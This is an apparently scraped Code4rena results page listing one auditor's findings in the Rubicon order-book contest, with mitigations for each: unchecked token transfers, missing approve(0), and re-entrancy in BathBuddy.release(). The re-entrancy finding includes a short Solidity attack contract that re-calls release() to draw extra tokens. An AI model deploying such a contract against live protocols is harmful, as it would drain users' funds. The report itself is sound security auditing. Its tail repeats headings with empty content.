Rubicon contest - cryptphi's results

An order book protocol for Ethereum, built on L2s.

General Information

Platform: Code4rena

Start Date: 23/05/2022

Pot Size: $50,000 USDC

Total HM: 44

Participants: 99

Period: 5 days

Judge: hickuphh3

Total Solo HM: 11

Id: 129

League: ETH

Rubicon

Findings Distribution

Researcher Performance

Rank: 31/99

Findings: 4

Award: $257.48

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest Page Github Contest Repository Github Findings Repository Rubicon

Findings Information

🌟 Selected for report: berndartmueller

Also found by: 0x1f8b, 0xDjango, 0xsomeone, ACai, Bahurum, BouSalman, CertoraInc, Deivitto, Dravee, GimelSec, IllIllI, JMukesh, Kaiziron, PP1004, Ruhum, SmartSek, VAD37, WatchPug, _Adam, aez121, antonttc, blockdev, broccolirob, camden, cccz, cryptphi, defsec, dipp, ellahi, fatherOfBlocks, gzeon, horsefacts, ilan, jayjonah8, joestakey, kenta, kenzo, minhquanym, oyc_109, pauliax, pedroais, peritoflores, sashik_eth, shenwilly, simon135, throttle, xiaoming90, z3s

Awards

0.1022 USDC - $0.10

Labels

bug

duplicate

2 (Med Risk)

External Links

Link to GitHub issue

Lines of code

Vulnerability details

Impact

The smart contract does not check the return value for transfer() and transferFrom() in different functions in the contract.

Proof of Concept

Tools Used

Manual review

Recommended Mitigation Steps

Wrap the call into a require() or use openzeppelin's SafeERC20 library.

#0 - bghughes
2022-06-04T21:03:55Z

Duplicate of #316

Findings Information

🌟 Selected for report: kenzo

Also found by: 0x1f8b, 0xsomeone, Dravee, IllIllI, MaratCerby, berndartmueller, cryptphi, xiaoming90

Labels

bug

duplicate

2 (Med Risk)

upgraded by judge

Awards

42.6857 USDC - $42.69

External Links

Link to GitHub issue

Judge has assessed an item in Issue #220 as Medium risk. The relevant finding follows:

#0 - HickupHH3
2022-06-25T03:41:55Z

Missing approve(0) RubiconRouter.sol approveAssetOnMarket() - line 157 RubiconRouter.sol depositWithETH() - line 465 BathToken.initialize() - line 214 BathToken.approveMarket() - line 256 Impact ERC20.approve() function is called only once without setting the allowance to zero. Some tokens, require first reducing the address' allowance to zero by calling approve(_spender, 0). Transactions will revert when using an unsupported token.

Proof of Concept: *https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/RubiconRouter.sol#L157 *https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/RubiconRouter.sol#L465 https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L256

Recommended Mitigation Steps: Use approve(_spender, 0) to set the allowance to zero immediately before each of the existing approve() calls.

dup of #100

Findings Information

🌟 Selected for report: kebabsec

Also found by: 0xsomeone, cryptphi, kenzo

Labels

bug

duplicate

2 (Med Risk)

Awards

162.6494 USDC - $162.65

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/peripheral_contracts/BathBuddy.sol#L114

Vulnerability details

Impact

The beneficiary is allowed to call release() without any reentrancy guards. The beneficiary may transfer Bath Tokens to a receiver multiple times before _erc20Released[address(token)] gets updated when there is a callback at line 114.

Proof of Concept

https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/peripheral_contracts/BathBuddy.sol#L114

Below is a just a simple re-entrancy contract for the beneficiary to deploy and call to explain above issue.

contract GetMoreBathToken{
    BathBuddy bathBuddy;
    address public token = tokenAddress;
    uint256 public sharesWithdrawn = sharesWithdrawn;
    uint256 public initialTotalSupply = initialTotalSupply;
    uint256 public poolFee = poolFee;
    
    
    constructor(address _bathBuddyAddress) public {
        bathBuddy = BathBuddy(_bathBuddyAddress);
    }    receive() external payable {
        if (bathBuddy.released(token) >= 1){
            bathBuddy.release(token, address(this), sharesWithdrawn,  initialTotalSupply, poolFee);
            
        }
    }    function attack() external payable{
        bathBuddy.release(token, address(this), sharesWithdrawn,  initialTotalSupply, poolFee);
        
        
    }
    function getBalance() public view returns(uint){
        return address(this).balance;
        
    }}

Tools Used

Manual review

Recommended Mitigation Steps

Add nonReentrant modifier to the declaration of release()

#0 - bghughes
2022-06-03T20:00:37Z

Duplicate of #283

Findings Information

🌟 Selected for report: IllIllI

Also found by: 0x1337, 0x1f8b, 0x4non, 0xDjango, 0xKitsune, 0xNazgul, 0xf15ers, ACai, AlleyCat, Bahurum, BouSalman, CertoraInc, Chom, Dravee, ElKu, FSchmoede, Funen, GimelSec, Hawkeye, JC, JMukesh, Kaiziron, MaratCerby, Metatron, PP1004, Picodes, Ruhum, SmartSek, StErMi, TerrierLover, UVvirus, UnusualTurtle, WatchPug, Waze, _Adam, asutorufos, berndartmueller, blackscale, blockdev, broccolirob, c3phas, catchup, cryptphi, csanuragjain, defsec, delfin454000, dipp, eccentricexit, ellahi, fatherOfBlocks, gzeon, hansfriese, horsefacts, hubble, ilan, joestakey, kebabsec, minhquanym, oyc_109, parashar, pauliax, rotcivegaf, sach1r0, sashik_eth, shenwilly, simon135, sorrynotsorry, sseefried, throttle, unforgiven, xiaoming90

Awards

52.0353 USDC - $52.04

Labels

bug

QA (Quality Assurance)

External Links

Link to GitHub issue

Anyone can run startErUp if not started The function startErUp() can be called by anyone so long it is not started yet.

Missing approve(0) RubiconRouter.sol approveAssetOnMarket() - line 157 RubiconRouter.sol depositWithETH() - line 465 BathToken.initialize() - line 214 BathToken.approveMarket() - line 256

Impact ERC20.approve() function is called only once without setting the allowance to zero. Some tokens, require first reducing the address' allowance to zero by calling approve(_spender, 0). Transactions will revert when using an unsupported token.

Recommended Mitigation Steps: Use approve(_spender, 0) to set the allowance to zero immediately before each of the existing approve() calls.

Unchecked return value of transfer() and transferFrom() in RubinconRouter.sol The smart contract does not check the return value for transfer() and transferFrom() in different functions in the contract.

Occurrences are in: BathToken._withdraw() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L602 BathToken.rebalance() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L353 BathToken.rebalance() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L357 BathToken._withdraw() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L605 BathToken._deposit() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L565

Recommendations: Wrap the call into a require() or use openzeppelin's SafeERC20 library.

Missing zero address check Some functions are missing a check for zero address.

Occurrences are in: RubiconRouter._swap() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/RubiconRouter.sol#L251 BathToken._withdraw() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L588 BathToken._deposit() - https://github.com/code-423n4/2022-05-rubicon/blob/main/contracts/rubiconPools/BathToken.sol#L557

require with empty message RubiconRouter.startErUp() uses a require with an empty message.

Rubicon contest - cryptphi's results

An order book protocol for Ethereum, built on L2s.

General Information

Findings Distribution

Researcher Performance

External Links

[M-03] Unchecked return value of transfer() and transferFrom() in RubinconRouter.sol - $0.10

Findings Information

Awards

Labels

External Links

Lines of code

Vulnerability details

Impact

Proof of Concept

Tools Used

Recommended Mitigation Steps

#0 - bghughes2022-06-04T21:03:55Z

[M-08] Upgraded Q -> M from 220 [1656128466897] - $42.69

Findings Information

Labels

Awards

External Links

#0 - HickupHH32022-06-25T03:41:55Z

[M-23] More Bath Token funds can be sent to receiver through re-entrancy - $162.65

Findings Information

Labels

Awards

External Links

Lines of code

Vulnerability details

Impact

Proof of Concept

Tools Used

Recommended Mitigation Steps

#0 - bghughes2022-06-03T20:00:37Z

[Q-22] QA Report - $52.04

Findings Information

Awards

Labels

External Links

#0 - bghughes
2022-06-04T21:03:55Z

#0 - HickupHH3
2022-06-25T03:41:55Z

#0 - bghughes
2022-06-03T20:00:37Z